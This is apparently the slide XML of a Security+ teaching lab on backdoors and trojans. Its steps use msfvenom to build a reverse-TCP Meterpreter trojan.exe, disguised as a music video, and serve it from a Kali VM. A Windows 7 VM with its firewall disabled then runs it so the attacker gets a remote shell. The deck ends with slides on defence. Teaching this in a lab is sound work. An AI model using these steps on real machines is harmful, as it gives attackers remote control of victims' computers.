                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2039" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>=1717 -f exe -o trojan.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3340" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2039" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier" panose="02060409020205020404"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exists in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2039" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2039" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2039" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>/www/html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404"/>
              </a:rPr>
              <a:t>ls -a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450E9F-F547-4A65-A262-D326489AD4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500064" y="3262084"/>
            <a:ext cx="5422340" cy="1224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7859" tIns="17859" rIns="17859" bIns="17859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endParaRPr lang="en-US" sz="2109" b="1">
              <a:latin typeface="Courier" panose="020604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D16C90-0637-4BA0-8F61-949F26724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576" y="2622571"/>
            <a:ext cx="4117862" cy="1144088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3546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5F0D11-4169-4636-A20F-A4136F505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03" y="2742340"/>
            <a:ext cx="6031194" cy="429810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E01E25-32C8-4C3F-B125-8106084A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Install the Trojan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35F15-3A41-42E6-B9EA-AEA735DD8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800692"/>
            <a:ext cx="8143875" cy="573252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take a look at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MSFVenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1547" b="1" dirty="0">
              <a:latin typeface="Courier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F07CE-3297-4831-9943-2F78AB5F9C45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3031362" y="2312919"/>
            <a:ext cx="1761427" cy="209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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-p specifies the payload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768D19-B8C3-488E-BE05-E0364281DD2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912076" y="2522110"/>
            <a:ext cx="487077" cy="306567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ED39DF-7EC5-40DC-B82B-3A955DC909D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162689" y="3542018"/>
            <a:ext cx="1761427" cy="209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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sets the local host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4B09D9-FC7F-48A0-88D3-3D07B138A28A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1814282" y="3172150"/>
            <a:ext cx="177136" cy="348345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D88ACD-79EA-418E-ADEA-8ED172554EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2301280" y="3342417"/>
            <a:ext cx="1761427" cy="209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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sets the local port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9E81B5-8B9D-4CC9-8692-A1887953F1A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3237928" y="3172152"/>
            <a:ext cx="472363" cy="188163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AE158C-D6CE-4604-BB25-49DEB3729235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3439871" y="3520496"/>
            <a:ext cx="1761427" cy="209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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-f sets the format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2D210A-9300-4F82-B252-01101E6BA585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4268599" y="3172150"/>
            <a:ext cx="134261" cy="326824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2DBA0C3-E59B-41AB-9EE6-CA3ABC729462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732558" y="3323579"/>
            <a:ext cx="1761427" cy="209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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-o sets the output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9A8F23-BF38-4C83-B7EC-8DF634D04C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5066479" y="3126663"/>
            <a:ext cx="602729" cy="214814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9B8FA48-7C7D-4504-908C-2B343A2C2800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500063" y="3855405"/>
            <a:ext cx="8143875" cy="866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7859" tIns="17859" rIns="17859" bIns="17859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sz="2250" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Start the web server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>service apache2 start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2C84E1B-D447-4D04-AD27-ECD7E439F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928" y="4052322"/>
            <a:ext cx="4331116" cy="237217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8658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22F6-24FF-434A-98B0-4796DE56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Play the Victim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4E43-1F99-4AEE-B654-C64ED2C3D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4" y="1800691"/>
            <a:ext cx="6937055" cy="3438318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>In the Windows environment, open Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1898" dirty="0"/>
              <a:t>Go to the following URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>Kali_IP_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>/trojan.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1688" dirty="0">
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1547" dirty="0"/>
              <a:t> Enter your Kali’s actual IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t>You should see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1688" b="1" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>trojan.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t>file download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1828" dirty="0"/>
              <a:t>When prompted, select “Run”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t>In Kali, you should see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t> session open.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1266" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1688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B66F1-CFA7-4C31-863F-9A020CD89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706" y="632386"/>
            <a:ext cx="2778877" cy="1113304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0B51F9-3381-4F38-8216-044FAB136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145" y="1431261"/>
            <a:ext cx="2150225" cy="163139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D52DF3-D27A-4E20-8CE3-B4FDE4D88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590" y="4478644"/>
            <a:ext cx="2788819" cy="87036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7164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543C-56C8-45F3-9F11-5815106A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Accessing the Backdoor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09565-30C5-4A3F-8637-164F85CC9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you have access, what can be done?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2109" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to enter a Windows Command Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can you create a folder on the desktop?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to navigate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to show the contents of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ectory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(same as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will also use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for other labs and show how other attacks can happen once you are in the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278367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4E87-2A74-4FE9-B099-0CCD360E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Defend Against Backdoors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68D7-A838-4E1A-96D5-90119D52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7886700" cy="4067172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a firewall!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember you disabled the firewall at the beginning of this lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewalls help prevent malicious software from sending out data without you knowing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not run untrusted software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ask "Who/Where did this software come from?"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember we pressed “Run” when Windows was telling us that this file could harm the system?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some other ways of defending against a backdoor attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9739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Backdoor/Trojan 2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w Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Materials needed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Kali Linux Virtual Machine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Windows 7 Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software tool used (from Kali Linux)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Metasploit Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tw Cen MT"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note: This lab will establish a backdoor via Reverse TCP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4E87-2A74-4FE9-B099-0CCD360E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Defend Against Trojans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68D7-A838-4E1A-96D5-90119D523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download from trusted sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What website did you download from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think before running a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did Windows warn you before running the Trojan?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are some other ways of defending against a Trojan?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30911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Security+ Objectives (SY0-501)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objective 1.1 – Given a scenario, analyze indicators of compromise and determine the type of malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DHS CAE Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTH – Describe different types of attacks and their characteristics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6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Backdoor Attack?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8FE-5958-4695-9408-98B27A54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34" y="1911968"/>
            <a:ext cx="4004466" cy="378779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A backdoor is when a malicious user gains privileged access to the system by circumventing normal authentication processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In this lab, you will gain access to the Windows system's command prompt from the Linux command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This lab’s end result is very similar to the Backdoor/Trojan 1 Lab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07F65-894B-409B-9EFA-2FF316C90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574" y="2185869"/>
            <a:ext cx="3410896" cy="971525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8F040F-AEA4-496C-850C-F7DB8D5DD568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5204166" y="3317779"/>
            <a:ext cx="2825711" cy="360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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1055" dirty="0"/>
              <a:t>Here a Linux machine is controlling a Windows machine via a backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33921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Trojan?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8FE-5958-4695-9408-98B27A54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32" y="1911969"/>
            <a:ext cx="4446984" cy="3438318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t>A Trojan horse attack is when the user thinks they are running a program on their computer, but it is actually something else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1828" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828" dirty="0" err="1"/>
              <a:t>trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1828" dirty="0"/>
              <a:t> in this lab will set up a backdoor to allow other attacks in other labs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2109" dirty="0"/>
              <a:t>This lab is very similar to the Backdoor/Trojan 1 Lab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BBC4F-7347-4A52-AF29-E7395BA89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838" y="1800692"/>
            <a:ext cx="2825711" cy="184353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3E5FBF-307D-423D-8DB1-BB7628014B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594838" y="3778862"/>
            <a:ext cx="2825711" cy="5231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7859" tIns="17859" rIns="17859" bIns="17859" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="290215"/>
            <a:r>
              <a:rPr lang="en-US" sz="1055" dirty="0"/>
              <a:t>This Trojan is meant to look like a music video, but is actually a .exe file ready to open a backdoor on the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242617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Trojan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61651"/>
            <a:ext cx="4756150" cy="3438318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="401836" indent="-401836">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setup VM environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="401836" indent="-401836">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialize Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="401836" indent="-401836">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create and install Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="401836" indent="-401836">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Play the Victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="401836" indent="-401836">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access the Backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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692136"/>
            <a:ext cx="7886700" cy="3667538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log into your range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the Kali Linux and Windows 7 Environments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You should be on your Kali Linux Desktop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You should also be on your Windows 7 Desktop</a:t>
            </a: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9073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011C-DF78-4134-94E1-CA748AC5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7A967-D208-49EC-A308-21F7E5073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your network location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click on the Windows Start button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for “Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open the Network and Sharing Center program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Under you Network #, click on the “Public Network”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the “Home Network” option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disables the Windows Firewall and allows the attack.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EF647-7A77-4287-B567-506ECCADA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278" y="1254728"/>
            <a:ext cx="2171161" cy="1554551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20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47EC-31E7-4056-AF66-8CA24552A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403590" cy="1325563"/>
